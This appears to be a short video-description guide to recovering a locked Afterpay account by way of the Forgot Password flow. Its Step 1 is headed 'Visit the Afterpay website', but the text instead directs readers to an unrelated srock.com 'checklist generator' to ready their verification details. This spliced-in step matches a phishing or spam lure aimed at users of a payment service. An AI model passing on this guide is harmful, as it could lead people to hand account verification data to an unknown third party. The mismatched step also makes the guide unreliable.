If you find yourself locked out of your Afterpay account, don't worry. This guide will walk you through the steps to recover your account easily. Step 1. Visit the Afterpay website. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Click on Forgot Password. On the login page, look for the Forgot Password link. Clicking this will take you to the password recovery section. Step 3. Enter your email address. Input the email address associated with your Afterpay account. Make sure it is the correct email to ensure you receive the recovery instructions. Step 4. Check your email. After submitting your email, check your inbox for a password reset email from Afterpay. Follow the instructions in the email to reset your password. Step 5. Log in with new password. Once you have reset your password, return to the Afterpay login page. Enter your email and the new password to access your account. If you follow these steps, you should be able to recover your locked Afterpay account successfully. If you encounter any issues, consider reaching out to Afterpay's customer support for further assistance.